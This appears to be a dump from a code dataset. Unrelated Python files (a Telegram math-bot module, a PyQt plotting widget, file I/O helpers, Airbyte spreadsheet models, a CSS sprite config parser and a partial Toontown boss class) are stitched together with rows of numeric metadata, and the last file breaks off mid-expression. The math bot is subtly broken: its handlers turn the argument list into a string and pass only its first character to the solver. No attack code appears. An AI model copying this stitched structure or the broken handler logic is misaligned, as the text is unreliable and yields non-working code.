from typing import List import requests from telegram import Message, Update, Bot, MessageEntity from telegram.ext import CommandHandler, run_async from emilia import dispatcher from emilia.modules.disable import DisableAbleCommandHandler from emilia.modules.helper_funcs.alternate import send_message import pynewtonmath as newton import math @run_async def simplify(update, context): args=context.args args=str(args) message = update.effective_message message.reply_text(newton.simplify('{}'.format(args[0]))) @run_async def factor(update, context): args=context.args args=str(args) message = update.effective_message message.reply_text(newton.factor('{}'.format(args[0]))) @run_async def derive(update, context): args=context.args args=str(args) message = update.effective_message message.reply_text(newton.derive('{}'.format(args[0]))) @run_async def integrate(update, context): args=context.args args=str(args) message = update.effective_message message.reply_text(newton.integrate('{}'.format(args[0]))) @run_async def zeroes(update, context): args=context.args args=str(args) message = update.effective_message message.reply_text(newton.zeroes('{}'.format(args[0]))) @run_async def tangent(update, context): args=context.args args=str(args) message = update.effective_message message.reply_text(newton.tangent('{}'.format(args[0]))) @run_async def area(update, context): args=context.args args=str(args) message = update.effective_message message.reply_text(newton.area('{}'.format(args[0]))) @run_async def cos(update, context): args = context.args message = update.effective_message message.reply_text(math.cos(int(args[0]))) @run_async def sin(update, context): args = context.args message = update.effective_message message.reply_text(math.sin(int(args[0]))) @run_async def tan(update, context): args = context.args message = update.effective_message message.reply_text(math.tan(int(args[0]))) @run_async def arccos(update, context): args = context.args message = update.effective_message message.reply_text(math.acos(int(args[0]))) @run_async def arcsin(update, context): args = context.args message = update.effective_message message.reply_text(math.asin(int(args[0]))) @run_async def arctan(update, context): args = context.args message = update.effective_message message.reply_text(math.atan(int(args[0]))) @run_async def abs(update, context): args = context.args message = update.effective_message message.reply_text(math.fabs(int(args[0]))) @run_async def log(update, context): args = context.args message = update.effective_message message.reply_text(math.log(int(args[0]))) __help__ = """ Under Developmeent.. More features soon - /cos: Cosine `/cos pi` - /sin: Sine `/sin 0` - /tan: Tangent `/tan 0` - /arccos: Inverse Cosine `/arccos 1` - /arcsin: Inverse Sine `/arcsin 0` - /arctan: Inverse Tangent `/arctan 0` - /abs: Absolute Value `/abs -1` - /log: Logarithm `/log 2l8` __Keep in mind__: To find the tangent line of a function at a certain x value, send the request as c|f(x) where c is the given x value and f(x) is the function expression, the separator is a vertical bar '|'. See the table above for an example request. To find the area under a function, send the request as c:d|f(x) where c is the starting x value, d is the ending x value, and f(x) is the function under which you want the curve between the two x values. To compute fractions, enter expressions as numerator(over)denominator. For example, to process 2/4 you must send in your expression as 2(over)4. The result expression will be in standard math notation (1/2, 3/4). """ SIMPLIFY_HANDLER = DisableAbleCommandHandler("math", simplify, pass_args=True) FACTOR_HANDLER = DisableAbleCommandHandler("factor", factor, pass_args=True) DERIVE_HANDLER = DisableAbleCommandHandler("derive", derive, pass_args=True) INTEGRATE_HANDLER = DisableAbleCommandHandler("integrate", integrate, pass_args=True) ZEROES_HANDLER = DisableAbleCommandHandler("zeroes", zeroes, pass_args=True) TANGENT_HANDLER = DisableAbleCommandHandler("tangent", tangent, pass_args=True) AREA_HANDLER = DisableAbleCommandHandler("area", area, pass_args=True) COS_HANDLER = DisableAbleCommandHandler("cos", cos, pass_args=True) SIN_HANDLER = DisableAbleCommandHandler("sin", sin, pass_args=True) TAN_HANDLER = DisableAbleCommandHandler("tan", tan, pass_args=True) ARCCOS_HANDLER = DisableAbleCommandHandler("arccos", arccos, pass_args=True) ARCSIN_HANDLER = DisableAbleCommandHandler("arcsin", arcsin, pass_args=True) ARCTAN_HANDLER = DisableAbleCommandHandler("arctan", arctan, pass_args=True) ABS_HANDLER = DisableAbleCommandHandler("abs", abs, pass_args=True) LOG_HANDLER = DisableAbleCommandHandler("log", log, pass_args=True) dispatcher.add_handler(SIMPLIFY_HANDLER) dispatcher.add_handler(FACTOR_HANDLER) dispatcher.add_handler(DERIVE_HANDLER) dispatcher.add_handler(INTEGRATE_HANDLER) dispatcher.add_handler(ZEROES_HANDLER) dispatcher.add_handler(TANGENT_HANDLER) dispatcher.add_handler(AREA_HANDLER) dispatcher.add_handler(COS_HANDLER) dispatcher.add_handler(SIN_HANDLER) dispatcher.add_handler(TAN_HANDLER) dispatcher.add_handler(ARCCOS_HANDLER) dispatcher.add_handler(ARCSIN_HANDLER) dispatcher.add_handler(ARCTAN_HANDLER) dispatcher.add_handler(ABS_HANDLER) dispatcher.add_handler(LOG_HANDLER) __mod_name__ = "Math" __command_list__ = ["math","factor","derive","integrate","zeroes","tangent","area","cos","sin","tan","arccos","arcsin","arctan","abs","log"] __handlers__ = [ SIMPLIFY_HANDLER,FACTOR_HANDLER,DERIVE_HANDLER,INTEGRATE_HANDLER,TANGENT_HANDLER,ZEROES_HANDLER,AREA_HANDLER,COS_HANDLER,SIN_HANDLER,TAN_HANDLER,ARCCOS_HANDLER,ARCSIN_HANDLER,ARCTAN_HANDLER,ABS_HANDLER,LOG_HANDLER ]
35.769697
252
0.763978
803
5,902
5.43462
0.17061
0.075619
0.037809
0.082493
0.376031
0.36824
0.296517
0.296517
0.285518
0.285518
0
0.005975
0.120976
5,902
164
253
35.987805
0.835197
0
0
0.371429
0
0.021429
0.192138
0.004575
0
0
0
0
0
1
0.107143
false
0.107143
0.064286
0
0.171429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5dcd4858a80507237d1cda30d4f8de4336f40710
3,044
py
Python
src/views/age_results_widget.py
RubyMarsden/Crayfish
33bbb1248beec2fc40eee59e462711dd8cbc33da
[ "MIT" ]
null
null
null
src/views/age_results_widget.py
RubyMarsden/Crayfish
33bbb1248beec2fc40eee59e462711dd8cbc33da
[ "MIT" ]
8
2021-03-19T06:35:48.000Z
2021-03-31T14:23:24.000Z
src/views/age_results_widget.py
RubyMarsden/Crayfish
33bbb1248beec2fc40eee59e462711dd8cbc33da
[ "MIT" ]
null
null
null
import matplotlib from PyQt5.QtCore import Qt from PyQt5.QtWidgets import QHBoxLayout, QDialog, QPushButton, QWidget, QVBoxLayout, QLabel matplotlib.use('QT5Agg') import matplotlib.pyplot as plt from models.data_key import DataKey from utils import ui_utils class AgeResultsWidget(QWidget): def __init__(self, results_dialog): QWidget.__init__(self) self.results_dialog = results_dialog layout = QHBoxLayout() layout.addLayout(self._create_widget()) self.setLayout(layout) results_dialog.sample_tree.tree.currentItemChanged.connect(lambda i, j: self.replot_graph()) results_dialog.configuration_changed.connect(self.replot_graph) def _create_widget(self): layout = QVBoxLayout() layout.addWidget(QLabel("Sample and spot name")) layout.addWidget(self._create_age_graph_and_point_selection()) return layout def _create_age_graph_and_point_selection(self): graph_and_points = QWidget() layout = QVBoxLayout() fig = plt.figure() self.axes = plt.axes() graph_widget, self.canvas = ui_utils.create_figure_widget(fig, self) layout.addWidget(graph_widget) graph_and_points.setLayout(layout) return graph_and_points ############### ### Actions ### ############### def replot_graph(self): current_spot = self.results_dialog.sample_tree.current_spot() config = self.results_dialog.configuration_widget.current_config if config and current_spot: self.plot_cps_graph(current_spot, config) def plot_cps_graph(self, spot, config): axis = self.axes axis.clear() if spot is None: return axis.spines['top'].set_visible(False) axis.spines['right'].set_visible(False) xs = [] ys = [] errors = [] if DataKey.AGES not in spot.data[config]: # TODO plot words on graph return ages = spot.data[config][DataKey.AGES] if len(ages) != 0: for i, age in enumerate(ages): if isinstance(age, str): continue x = i + 1 y, dy = age xs.append(x) if y is None: ys.append(0) errors.append(0) else: ys.append(y) errors.append(dy) else: # TODO plot some text return weighted_age, age_st_dev = spot.data[config][DataKey.WEIGHTED_AGE] if isinstance(weighted_age, str): string = "No weighted age" else: string = f"Weighted age: {weighted_age:.0f}, 1σ: {age_st_dev:.0f}" axis.errorbar(xs, ys, yerr=errors, linestyle="none", marker='o') axis.text(0.5, 1, string, transform=axis.transAxes, horizontalalignment="center") axis.set_xlabel("Scan number") axis.set_ylabel("Age (ka)") self.canvas.draw()
30.747475
100
0.598555
352
3,044
4.971591
0.352273
0.052
0.038857
0.026286
0.035429
0.035429
0
0
0
0
0
0.00608
0.297635
3,044
98
101
31.061224
0.812442
0.017411
0
0.109589
0
0
0.045054
0
0
0
0
0.010204
0
1
0.068493
false
0
0.082192
0
0.232877
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
5dcfe5f1b4cd41078d4a64e401536ccb2333c29f
1,827
py
Python
shortio/utils.py
byshyk/shortio
054014b3936495c86d2e2cd6a61c3cee9ab9b0f2
[ "MIT" ]
null
null
null
shortio/utils.py
byshyk/shortio
054014b3936495c86d2e2cd6a61c3cee9ab9b0f2
[ "MIT" ]
null
null
null
shortio/utils.py
byshyk/shortio
054014b3936495c86d2e2cd6a61c3cee9ab9b0f2
[ "MIT" ]
null
null
null
"""Contains utility functions.""" BIN_MODE_ARGS = {'mode', 'buffering', } TEXT_MODE_ARGS = {'mode', 'buffering', 'encoding', 'errors', 'newline'} def split_args(args): """Splits args into two groups: open args and other args. Open args are used by ``open`` function. Other args are used by ``load``/``dump`` functions. Args: args: Keyword args to split. Returns: open_args: Arguments for ``open``. other_args: Arguments for ``load``/``dump``. """ mode_args = BIN_MODE_ARGS if 'b' in args['mode'] else TEXT_MODE_ARGS open_args = {} other_args = {} for arg, value in args.items(): if arg in mode_args: open_args[arg] = value else: other_args[arg] = value return open_args, other_args def read_wrapper(load, **base_kwargs): """Wraps ``load`` function to avoid context manager boilerplate. Args: load: Function that takes the return of ``open``. **base_kwargs: Base arguments that ``open``/``load`` take. Returns: Wrapper for ``load``. """ def wrapped(file, **kwargs): open_args, load_args = split_args({**base_kwargs, **kwargs}) with open(file, **open_args) as f: return load(f, **load_args) return wrapped def write_wrapper(dump, **base_kwargs): """Wraps ``dump`` function to avoid context manager boilerplate. Args: dump: Function that takes the return of ``open`` and data to dump. **base_kwargs: Base arguments that ``open``/``dump`` take. Returns: Wrapper for ``dump``. """ def wrapped(file, obj, **kwargs): open_args, dump_args = split_args({**base_kwargs, **kwargs}) with open(file, **open_args) as f: dump(obj, f, **dump_args) return wrapped
26.478261
74
0.603175
235
1,827
4.531915
0.259574
0.075117
0.033803
0.039437
0.298592
0.298592
0.240376
0.097653
0.097653
0.097653
0
0
0.259442
1,827
68
75
26.867647
0.78714
0.423645
0
0.166667
0
0
0.054968
0
0
0
0
0
0
1
0.208333
false
0
0
0
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
5dd62019e7ff928c4383fc35d24cbff743f0c13d
2,157
py
Python
airbyte-integrations/connectors/source-google-sheets/google_sheets_source/models/spreadsheet.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
null
null
null
airbyte-integrations/connectors/source-google-sheets/google_sheets_source/models/spreadsheet.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
4
2021-04-30T08:10:26.000Z
2021-04-30T13:53:34.000Z
airbyte-integrations/connectors/source-google-sheets/google_sheets_source/models/spreadsheet.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
null
null
null
# MIT License # # Copyright (c) 2020 Airbyte # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from __future__ import annotations from typing import List, Optional from pydantic import BaseModel, Extra, Field class SpreadsheetProperties(BaseModel): class Config: extra = Extra.allow title: Optional[str] = None class SheetProperties(BaseModel): class Config: extra = Extra.allow title: Optional[str] = None class CellData(BaseModel): class Config: extra = Extra.allow formattedValue: Optional[str] = None class RowData(BaseModel): class Config: extra = Extra.allow values: Optional[List[CellData]] = None class GridData(BaseModel): class Config: extra = Extra.allow rowData: Optional[List[RowData]] = None class Sheet(BaseModel): class Config: extra = Extra.allow data: Optional[List[GridData]] = None properties: Optional[SheetProperties] = None class Spreadsheet(BaseModel): class Config: extra = Extra.allow spreadsheetId: str sheets: List[Sheet] properties: Optional[SpreadsheetProperties] = None
26.62963
80
0.730644
280
2,157
5.614286
0.446429
0.05598
0.089059
0.111323
0.187659
0.187659
0.076336
0.076336
0.076336
0.076336
0
0.002327
0.20306
2,157
80
81
26.9625
0.912158
0.49096
0
0.470588
0
0
0
0
0
0
0
0
0
1
0
false
0
0.088235
0
0.794118
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
5dd6c916a8fdc58e1d4d7d9b990faa3a6330daf0
3,957
py
Python
spritecss/config.py
yostudios/Spritemapper
277cb76a14be639b6d7fa3191bc427409e72ad69
[ "MIT" ]
49
2015-01-22T14:27:32.000Z
2021-12-24T23:07:40.000Z
spritecss/config.py
tzuryby/Spritemapper
7cd3b68348a86982420b6231861fda4a0e676f35
[ "MIT" ]
2
2015-02-12T12:31:34.000Z
2015-04-12T10:43:17.000Z
spritecss/config.py
tzuryby/Spritemapper
7cd3b68348a86982420b6231861fda4a0e676f35
[ "MIT" ]
6
2015-04-03T07:29:54.000Z
2021-12-15T02:21:35.000Z
import shlex from os import path from itertools import imap, ifilter from urlparse import urljoin from .css import CSSParser, iter_events def parse_config_stmt(line, prefix="spritemapper."): line = line.strip() if line.startswith(prefix) and "=" in line: (key, value) = line.split("=", 1) return (key[len(prefix):].strip(), value.strip()) def iter_config_stmts(data): return ifilter(None, imap(parse_config_stmt, data.splitlines())) def iter_css_config(parser): for ev in iter_events(parser, lexemes=("comment",)): for v in iter_config_stmts(ev.comment): yield v class CSSConfig(object): def __init__(self, parser=None, base=None, root=None, fname=None): if fname and root is None: root = path.dirname(fname) self.root = root self._data = dict(base) if base else {} if parser is not None: self._data.update(iter_css_config(parser)) def __iter__(self): # this is mostly so you can go CSSConfig(base=CSSConfig(..)) return self._data.iteritems() @classmethod def from_file(cls, fname): with open(fname, "rb") as fp: return cls(CSSParser.from_file(fp), fname=fname) def normpath(self, p): """Normalize a possibly relative path *p* to the root.""" return path.normpath(path.join(self.root, p)) def absurl(self, p): """Make an absolute reference to *p* from any configured base URL.""" base = self.base_url if base: p = urljoin(base, p) return p @property def base_url(self): return self._data.get("base_url") @property def sprite_dirs(self): if "sprite_dirs" not in self._data: return elif self._data.get("output_image"): raise RuntimeError("cannot have sprite_dirs " "when output_image is set") sdirs = shlex.split(self._data["sprite_dirs"]) return map(self.normpath, sdirs) @property def output_image(self): if "output_image" in self._data: return self.normpath(self._data["output_image"]) @property def is_mapping_recursive(self): rv = self._data.get("recursive") if rv and self._data.get("output_image"): raise RuntimeError("cannot have recursive spritemapping " "when output_image is set") elif rv is None: return not self._data.get("output_image") else: return bool(rv) @property def padding(self): return self._data.get("padding", (1, 1)) @property def anneal_steps(self): return int(self._data.get("anneal_steps", 9200)) def get_spritemap_out(self, dn): "Get output image filename for spritemap directory *dn*." if "output_image" in self._data: return self.output_image return dn + ".png" def get_spritemap_url(self, fname): "Get output image URL for spritemap *fname*." return self.absurl(path.relpath(fname, self.root)) def get_css_out(self, fname): "Get output image filename for spritemap directory *fname*." (dirn, base) = path.split(fname) if "output_css" in self._data: (base, ext) = path.splitext(base) names = dict(filename=fname, dirname=dirn, basename=base, extension=ext) return self.normpath(self._data["output_css"].format(**names)) else: return path.join(dirn, "sm_" + base) def print_config(fname): from pprint import pprint from .css import CSSParser with open(fname, "rb") as fp: print "%s\n%s\n" % (fname, "=" * len(fname)) pprint(dict(iter_css_config(CSSParser.read_file(fp)))) print def main(): import sys for fn in sys.argv[1:]: print_config(fn) if __name__ == "__main__": main()
31.656
77
0.608036
515
3,957
4.508738
0.269903
0.05857
0.033161
0.020672
0.205857
0.147287
0.107666
0.070629
0.042205
0
0
0.002801
0.278241
3,957
124
78
31.91129
0.810224
0.014658
0
0.14
0
0
0.123044
0
0
0
0
0
0
0
null
null
0
0.08
null
null
0.06
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5dd847419564638f2f188cabc13087183aa80082
83,813
py
Python
toontown/suit/DistributedLawbotBoss.py
SuperM0use24/TT-CL-Edition
fdad8394f0656ae122b687d603f72afafd220c65
[ "MIT" ]
null
null
null
toontown/suit/DistributedLawbotBoss.py
SuperM0use24/TT-CL-Edition
fdad8394f0656ae122b687d603f72afafd220c65
[ "MIT" ]
1
2021-06-08T17:16:48.000Z
2021-06-08T17:16:48.000Z
toontown/suit/DistributedLawbotBoss.py
SuperM0use24/TT-CL-Edition
fdad8394f0656ae122b687d603f72afafd220c65
[ "MIT" ]
3
2021-06-03T05:36:36.000Z
2021-06-22T15:07:31.000Z
from direct.showbase.ShowBase import * from direct.interval.IntervalGlobal import * from toontown.battle.BattleProps import * from direct.distributed.ClockDelta import * from direct.showbase.PythonUtil import Functor from direct.showbase.PythonUtil import StackTrace from direct.gui.DirectGui import * from panda3d.core import * from libotp import * from direct.fsm import FSM from direct.fsm import ClassicFSM from direct.fsm import State from direct.directnotify import DirectNotifyGlobal from toontown.toonbase import ToontownGlobals from toontown.toonbase import ToontownBattleGlobals import DistributedBossCog from toontown.toonbase import TTLocalizer import SuitDNA from toontown.toon import Toon from toontown.battle import BattleBase from direct.directutil import Mopath from direct.showutil import Rope from toontown.distributed import DelayDelete from toontown.battle import MovieToonVictory from toontown.building import ElevatorUtils from toontown.battle import RewardPanel from toontown.toon import NPCToons from direct.task import Task import random import math from toontown.coghq import CogDisguiseGlobals from toontown.building import ElevatorConstants from toontown.toonbase import ToontownTimer OneBossCog = None class DistributedLawbotBoss(DistributedBossCog.DistributedBossCog, FSM.FSM): notify = DirectNotifyGlobal.directNotify.newCategory('DistributedLawbotBoss') debugPositions = False def __init__(self, cr): self.notify.debug('----- __init___') DistributedBossCog.DistributedBossCog.__init__(self, cr) FSM.FSM.__init__(self, 'DistributedLawbotBoss') self.lawyers = [] self.lawyerRequest = None self.bossDamage = 0 self.attackCode = None self.attackAvId = 0 self.recoverRate = 0 self.recoverStartTime = 0 self.bossDamageMovie = None self.everThrownPie = 0 self.battleThreeMusicTime = 0 self.insidesANodePath = None self.insidesBNodePath = None self.strafeInterval = None self.onscreenMessage = None self.bossMaxDamage = ToontownGlobals.LawbotBossMaxDamage self.elevatorType = ElevatorConstants.ELEVATOR_CJ self.gavels = {} self.chairs = {} self.cannons = {} self.useCannons = 1 self.juryBoxIval = None self.juryTimer = None self.witnessToon = None self.witnessToonOnstage = False self.numToonJurorsSeated = 0 self.mainDoor = None self.reflectedMainDoor = None self.panFlashInterval = None self.panDamage = ToontownGlobals.LawbotBossDefensePanDamage if base.config.GetBool('lawbot-boss-cheat', 0): self.panDamage = 25 self.evidenceHitSfx = None self.toonUpSfx = None self.bonusTimer = None self.warningSfx = None self.juryMovesSfx = None self.baseColStashed = False self.battleDifficulty = 0 self.bonusWeight = 0 self.numJurorsLocalToonSeated = 0 self.cannonIndex = -1 return def announceGenerate(self): global OneBossCog self.notify.debug('----- announceGenerate') DistributedBossCog.DistributedBossCog.announceGenerate(self) self.setName(TTLocalizer.LawbotBossName) nameInfo = TTLocalizer.BossCogNameWithDept % {'name': self._name, 'dept': SuitDNA.getDeptFullname(self.style.dept)} self.setDisplayName(nameInfo) self.piesRestockSfx = loader.loadSfx('phase_5/audio/sfx/LB_receive_evidence.ogg') self.rampSlideSfx = loader.loadSfx('phase_9/audio/sfx/CHQ_VP_ramp_slide.ogg') self.evidenceHitSfx = loader.loadSfx('phase_11/audio/sfx/LB_evidence_hit.ogg') self.warningSfx = loader.loadSfx('phase_9/audio/sfx/CHQ_GOON_tractor_beam_alarmed.ogg') self.juryMovesSfx = loader.loadSfx('phase_11/audio/sfx/LB_jury_moves.ogg') self.toonUpSfx = loader.loadSfx('phase_11/audio/sfx/LB_toonup.ogg') self.strafeSfx = [] for i in xrange(10): self.strafeSfx.append(loader.loadSfx('phase_3.5/audio/sfx/SA_shred.ogg')) render.setTag('pieCode', str(ToontownGlobals.PieCodeNotBossCog)) insidesA = CollisionPolygon(Point3(4.0, -2.0, 5.0), Point3(-4.0, -2.0, 5.0), Point3(-4.0, -2.0, 0.5), Point3(4.0, -2.0, 0.5)) insidesANode = CollisionNode('BossZap') insidesANode.addSolid(insidesA) insidesANode.setCollideMask(ToontownGlobals.PieBitmask | ToontownGlobals.WallBitmask) self.insidesANodePath = self.axle.attachNewNode(insidesANode) self.insidesANodePath.setTag('pieCode', str(ToontownGlobals.PieCodeBossInsides)) self.insidesANodePath.stash() insidesB = CollisionPolygon(Point3(-4.0, 2.0, 5.0), Point3(4.0, 2.0, 5.0), Point3(4.0, 2.0, 0.5), Point3(-4.0, 2.0, 0.5)) insidesBNode = CollisionNode('BossZap') insidesBNode.addSolid(insidesB) insidesBNode.setCollideMask(ToontownGlobals.PieBitmask | ToontownGlobals.WallBitmask) self.insidesBNodePath = self.axle.attachNewNode(insidesBNode) self.insidesBNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeBossInsides)) self.insidesBNodePath.stash() target = CollisionTube(0, -1, 4, 0, -1, 9, 3.5) targetNode = CollisionNode('BossZap') targetNode.addSolid(target) targetNode.setCollideMask(ToontownGlobals.PieBitmask) self.targetNodePath = self.pelvis.attachNewNode(targetNode) self.targetNodePath.setTag('pieCode', str(ToontownGlobals.PieCodeBossCog)) shield = CollisionTube(0, 1, 4, 0, 1, 7, 3.5) shieldNode = CollisionNode('BossZap') shieldNode.addSolid(shield) shieldNode.setCollideMask(ToontownGlobals.PieBitmask | ToontownGlobals.CameraBitmask) shieldNodePath = self.pelvis.attachNewNode(shieldNode) disk = loader.loadModel('phase_9/models/char/bossCog-gearCollide') disk.find('**/+CollisionNode').setName('BossZap') disk.reparentTo(self.pelvis) disk.setZ(0.8) self.loadEnvironment() self.__makeWitnessToon() self.__loadMopaths() localAvatar.chatMgr.chatInputSpeedChat.addCJMenu() if OneBossCog != None: self.notify.warning('Multiple BossCogs visible.') OneBossCog = self return def disable(self): global OneBossCog self.notify.debug('----- disable') DistributedBossCog.DistributedBossCog.disable(self) self.request('Off') self.unloadEnvironment() self.__cleanupWitnessToon() self.__unloadMopaths() self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) self.__cleanupStrafe() self.__cleanupJuryBox() render.clearTag('pieCode') self.targetNodePath.detachNode() self.cr.relatedObjectMgr.abortRequest(self.lawyerRequest) self.lawyerRequest = None self.betweenBattleMusic.stop() self.promotionMusic.stop() self.stingMusic.stop() self.battleTwoMusic.stop() self.battleThreeMusic.stop() self.epilogueMusic.stop() if self.juryTimer: self.juryTimer.destroy() del self.juryTimer if self.bonusTimer: self.bonusTimer.destroy() del self.bonusTimer localAvatar.chatMgr.chatInputSpeedChat.removeCJMenu() if OneBossCog == self: OneBossCog = None return def delete(self): self.notify.debug('----- delete') DistributedBossCog.DistributedBossCog.delete(self) def d_hitBoss(self, bossDamage): self.notify.debug('----- d_hitBoss') self.sendUpdate('hitBoss', [bossDamage]) def d_healBoss(self, bossHeal): self.notify.debug('----- d_bossHeal') self.sendUpdate('healBoss', [bossHeal]) def d_hitBossInsides(self): self.notify.debug('----- d_hitBossInsides') self.sendUpdate('hitBossInsides', []) def d_hitDefensePan(self): self.notify.debug('----- d_hitDefensePan') self.sendUpdate('hitDefensePan', []) def d_hitProsecutionPan(self): self.notify.debug('----- d_hitProsecutionPan') self.sendUpdate('hitProsecutionPan', []) def d_hitToon(self, toonId): self.notify.debug('----- d_hitToon') self.sendUpdate('hitToon', [toonId]) def gotToon(self, toon): stateName = self.state if stateName == 'Elevator': self.placeToonInElevator(toon) def setLawyerIds(self, lawyerIds): self.lawyers = [] self.cr.relatedObjectMgr.abortRequest(self.lawyerRequest) self.lawyerRequest = self.cr.relatedObjectMgr.requestObjects(lawyerIds, allCallback=self.__gotLawyers) def __gotLawyers(self, lawyers): self.lawyerRequest = None self.lawyers = lawyers for i in xrange(len(self.lawyers)): suit = self.lawyers[i] suit.fsm.request('neutral') suit.loop('neutral') suit.setBossCogId(self.doId) return def setBossDamage(self, bossDamage, recoverRate, timestamp): recoverStartTime = globalClockDelta.networkToLocalTime(timestamp) self.bossDamage = bossDamage self.recoverRate = recoverRate self.recoverStartTime = recoverStartTime taskName = 'RecoverBossDamage' taskMgr.remove(taskName) if self.bossDamageMovie: if self.bossDamage >= self.bossMaxDamage: self.notify.debug('finish the movie then transition to NearVictory') self.bossDamageMovie.resumeUntil(self.bossDamageMovie.getDuration()) else: self.bossDamageMovie.resumeUntil(self.bossDamage * self.bossDamageToMovie) if self.recoverRate: taskMgr.add(self.__recoverBossDamage, taskName) self.makeScaleReflectDamage() self.bossHealthBar.update(self.bossMaxDamage - bossDamage, self.bossMaxDamage) def getBossDamage(self): self.notify.debug('----- getBossDamage') now = globalClock.getFrameTime() elapsed = now - self.recoverStartTime return max(self.bossDamage - self.recoverRate * elapsed / 60.0, 0) def __recoverBossDamage(self, task): self.notify.debug('----- __recoverBossDamage') if self.bossDamageMovie: self.bossDamageMovie.setT(self.getBossDamage() * self.bossDamageToMovie) return Task.cont def __walkToonToPromotion(self, toonId, delay, mopath, track, delayDeletes): self.notify.debug('----- __walkToonToPromotion') toon = base.cr.doId2do.get(toonId) if toon: destPos = toon.getPos() self.placeToonInElevator(toon) toon.wrtReparentTo(render) ival = Sequence(Wait(delay), Func(toon.suit.setPlayRate, 1, 'walk'), Func(toon.suit.loop, 'walk'), toon.posInterval(1, Point3(0, 90, 20)), ParallelEndTogether(MopathInterval(mopath, toon), toon.posInterval(2, destPos, blendType='noBlend')), Func(toon.suit.loop, 'neutral')) track.append(ival) delayDeletes.append(DelayDelete.DelayDelete(toon, 'LawbotBoss.__walkToonToPromotion')) def __walkSuitToPoint(self, node, fromPos, toPos): self.notify.debug('----- __walkSuitToPoint') vector = Vec3(toPos - fromPos) distance = vector.length() time = distance / (ToontownGlobals.SuitWalkSpeed * 1.8) return Sequence(Func(node.setPos, fromPos), Func(node.headsUp, toPos), node.posInterval(time, toPos)) def __makeRollToBattleTwoMovie(self): startPos = Point3(ToontownGlobals.LawbotBossBattleOnePosHpr[0], ToontownGlobals.LawbotBossBattleOnePosHpr[1], ToontownGlobals.LawbotBossBattleOnePosHpr[2]) if self.arenaSide: topRampPos = Point3(*ToontownGlobals.LawbotBossTopRampPosB) topRampTurnPos = Point3(*ToontownGlobals.LawbotBossTopRampTurnPosB) p3Pos = Point3(*ToontownGlobals.LawbotBossP3PosB) else: topRampPos = Point3(*ToontownGlobals.LawbotBossTopRampPosA) topRampTurnPos = Point3(*ToontownGlobals.LawbotBossTopRampTurnPosA) p3Pos = Point3(*ToontownGlobals.LawbotBossP3PosA) battlePos = Point3(ToontownGlobals.LawbotBossBattleTwoPosHpr[0], ToontownGlobals.LawbotBossBattleTwoPosHpr[1], ToontownGlobals.LawbotBossBattleTwoPosHpr[2]) battleHpr = VBase3(ToontownGlobals.LawbotBossBattleTwoPosHpr[3], ToontownGlobals.LawbotBossBattleTwoPosHpr[4], ToontownGlobals.LawbotBossBattleTwoPosHpr[5]) bossTrack = Sequence() self.notify.debug('calling setPosHpr') myInterval = camera.posHprInterval(8, Point3(-22, -100, 35), Point3(-10, -13, 0), startPos=Point3(-22, -90, 35), startHpr=Point3(-10, -13, 0), blendType='easeInOut') chatTrack = Sequence(Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempJury1, CFSpeech), Func(camera.reparentTo, localAvatar), Func(camera.setPos, localAvatar.getOldCameraPos()), Func(camera.setHpr, 0, 0, 0), Func(self.releaseToons, 1)) bossTrack.append(Func(self.getGeomNode().setH, 180)) track, hpr = self.rollBossToPoint(startPos, None, battlePos, None, 0) bossTrack.append(track) track, hpr = self.rollBossToPoint(battlePos, hpr, battlePos, battleHpr, 0) self.makeToonsWait() finalPodiumPos = Point3(self.podium.getX(), self.podium.getY(), self.podium.getZ() + ToontownGlobals.LawbotBossBattleTwoPosHpr[2]) finalReflectedPodiumPos = Point3(self.reflectedPodium.getX(), self.reflectedPodium.getY(), self.reflectedPodium.getZ() + ToontownGlobals.LawbotBossBattleTwoPosHpr[2]) return Sequence(chatTrack, bossTrack, Func(self.getGeomNode().setH, 0), Parallel(self.podium.posInterval(5.0, finalPodiumPos), self.reflectedPodium.posInterval(5.0, finalReflectedPodiumPos), Func(self.stashBoss), self.posInterval(5.0, battlePos), Func(taskMgr.doMethodLater, 0.01, self.unstashBoss, 'unstashBoss')), name=self.uniqueName('BattleTwoMovie')) def __makeRollToBattleThreeMovie(self): startPos = Point3(ToontownGlobals.LawbotBossBattleTwoPosHpr[0], ToontownGlobals.LawbotBossBattleTwoPosHpr[1], 